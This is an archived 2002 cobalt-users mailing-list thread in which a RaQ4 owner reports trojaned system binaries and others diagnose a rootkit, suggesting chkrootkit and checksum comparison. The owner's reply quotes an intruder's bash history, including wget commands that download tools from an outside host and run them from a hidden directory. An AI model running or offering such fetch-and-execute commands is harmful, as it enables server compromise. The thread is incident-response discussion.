[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-users] RAQ4 Some system files change ex: ls, top, netstat, login What's wrong ?

Hello,

so sad. some one hack my box.
He switch off my SSH.
Then I have to telnet.
he change file "login" and I think it is keep log somewhere.
Then I su to root. and see .bash_history

id
strings kernel.x
exit
cd /usr/include
mkdir ...
ps -aux | grep sk
wget rootshell.be/~borgon/sk
chmod +x sk
wget rootshell.be/~borgon/log
chmod +x log
./sk
./log -h 127.0.0.1





> also just noticed -
> 
> [root /bin]# ls -la | grep ls
> -rwxr-xr-x   1 root     root         5016 May 30  2000 false
> -rwxr-xr-x   1 root     root        50148 Sep  9  1999 ls
> 
> see ls is only 50 KB ish yours is over 100Kb definately looks like a rooted
> box.
> 
> also you could also manually check the MD5 checksums with
> 
> [root bin]# md5sum /bin/ls /bin/netstat /bin/ps /bin/login /sbin/syslogd
> /usr/bin/du /usr/bin/killall /usr/bin/pstree /usr/bin/top
> f482ae701e46005a358a01c139f1ae74  /bin/ls
> eaa285a23a1715ce1c59998761538721  /bin/netstat
> 5e1725f2734365fef9e55398785f3033  /bin/ps
> a6b700aeabfb87115b3cc1a47a5a19e1  /bin/login
> 5b0e9951a07a0b232f083a78e7fcf668  /sbin/syslogd
> 5b1e21c2ec8de4676d296df4aee68dbb  /usr/bin/du
> 65853ea831ee24aa8ce6718e916a6e17  /usr/bin/killall
> db8be064ac078021b8dafba1510994ab  /usr/bin/pstree
> 48fbbb48204825866ab3089c2db96e87  /usr/bin/top
> 
> they should match these....  as long as i havent been rooted ;)
> 
> fragga
> 
> ----- Original Message -----
> From: "Fragga" <fragga@xxxxxxxxxxxx>
> To: <cobalt-users@xxxxxxxxxxxxxxx>
> Sent: Monday, October 21, 2002 3:09 AM
> Subject: Re: [cobalt-users] RAQ4 Some system files change ex: ls, top,
> netstat, login What's wrong ?
> 
> 
> > Hi,
> >
> > if you havent performed a restore i would say that looked like a possible
> > rootkit using modified binarys.
> > download and run ( as root ) a root kit checker from
> > http://www.chkrootkit.org/ to check for one.
> > looks grim though. was this this box fully patched and do you allow any
> > users shell accounts ?
> >
> > fragga
> >
> > ----- Original Message -----
> > From: "Nucharin Jansen" <nucharin@xxxxxxxxxxx>
> > To: <cobalt-users@xxxxxxxxxxxxxxx>
> > Sent: Monday, October 21, 2002 12:56 AM
> > Subject: [cobalt-users] RAQ4 Some system files change ex: ls, top,
> netstat,
> > login What's wrong ?
> >
> >
> > >
> > > Hello,
> > >
> > > I couldn't access website at 18 - 20th.
> > > I request to reboot the RAQ4.
> > > When NOC reboot at 20th, I can't SSH.
> > > So, I enable  and use telnet to check.
> > > I found that many system files was replace by new one.
> > > ex:
> > >
> > >  /bin
> > > -rwxr-xr-x   1 root     root       184023 Oct 18 22:03 ls
> > > -rwxr-xr-x   1 root     root       258612 Oct 18 22:03 netstat
> > > -rwxr-xr-x   1 root     root        47388 Oct 18 22:03 ps
> > > -rwxr-xr-x   1 root     root        43336 Oct 18 22:03 login
> > >
> > > /sbin
> > > -rwxr-xr-x   1 root     root        28696 Oct 18 22:03 syslogd
> > >
> > > /usr/bin
> > > -rwxr-xr-x   1 root     root       117311 Oct 18 22:03 du
> > > -rwxr-xr-x   1 root     root        22459 Oct 18 22:03 killall
> > > -rwxr-xr-x   1 root     root        24147 Oct 18 22:03 pstree
> > > -rwxr-xr-x   1 root     root        68692 Oct 18 22:03 top
> > >
> > > I never ever install anything before.
> > > I asked the NOC sys engineer there.  they never touch my bluebox.
> > > Do you have any suggestion ?
> > > It is automatic restore or hacking ?
> > > I can't use "ps -efw" to list all processes too.
> > >
> > > Thank
> > > Nucharin J.
> > >
> > > _____________________________________
> > > cobalt-users mailing list
> > > cobalt-users@xxxxxxxxxxxxxxx
> > > To subscribe/unsubscribe, or to SEARCH THE ARCHIVES, go to:
> > > http://list.cobalt.com/mailman/listinfo/cobalt-users
> > >
> >
> 
> _____________________________________
> cobalt-users mailing list
> cobalt-users@xxxxxxxxxxxxxxx
> To subscribe/unsubscribe, or to SEARCH THE ARCHIVES, go to:
> http://list.cobalt.com/mailman/listinfo/cobalt-users